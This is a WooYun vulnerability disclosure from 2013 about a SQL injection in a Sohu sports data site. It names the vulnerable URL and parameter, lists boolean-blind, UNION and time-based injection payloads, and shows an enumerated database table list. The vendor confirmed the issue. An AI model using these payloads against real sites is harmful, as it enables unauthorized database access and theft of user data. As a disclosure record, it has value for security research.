漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-038318
漏洞标题:搜狐某站sql注入导致数万用户信息泄露
相关厂商:搜狐
漏洞作者: 霍大然
提交时间:2013-09-27 10:40
修复时间:2013-11-11 10:41
公开时间:2013-11-11 10:41
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开
简要描述:
搜狐某站sql注入导致严重信息泄露,包括(各种sohu库,数据库管理员的内部用户名与hash),只看了一个库,某用户表28110用户,包括手机号等信息泄露
详细说明:
问题网站地址:http://data.sports.sohu.com
注入点:
http://data.sports.sohu.com/nba/json/get_player_enc.php?teamid=6 (GET)
Place: GET
Parameter: teamid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: teamid=6 AND 1443=1443
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: teamid=6 UNION ALL SELECT NULL,CONCAT(0x717a6a6f71,0x61454276756c63646574,0x71727a7171)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: teamid=6 AND SLEEP(5)
数据库:
相关用户及hash:
漏洞证明:
女人栏目的数据库
web application technology: PHP 5.2.5
back-end DBMS: MySQL 5.0.11
Database: women
[18 tables]
+---------------------------+
| activity |
| activity_element_relation |
| brand |
| corp |
| feature |
| fragment_manage |
| message_tpl |
| need_add_activity |
| operation_log |
| product_category |
| recommend |
| report |
| report_feature |
| report_lolitabox |
| user_activity_info |
| user_activity_relation |
| user_extends |
| user_info |
+---------------------------+
用户表:
修复方案:
参数过滤
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-09-27 10:52
厂商回复:
感谢对sohu安全的支持。
最新状态:
暂无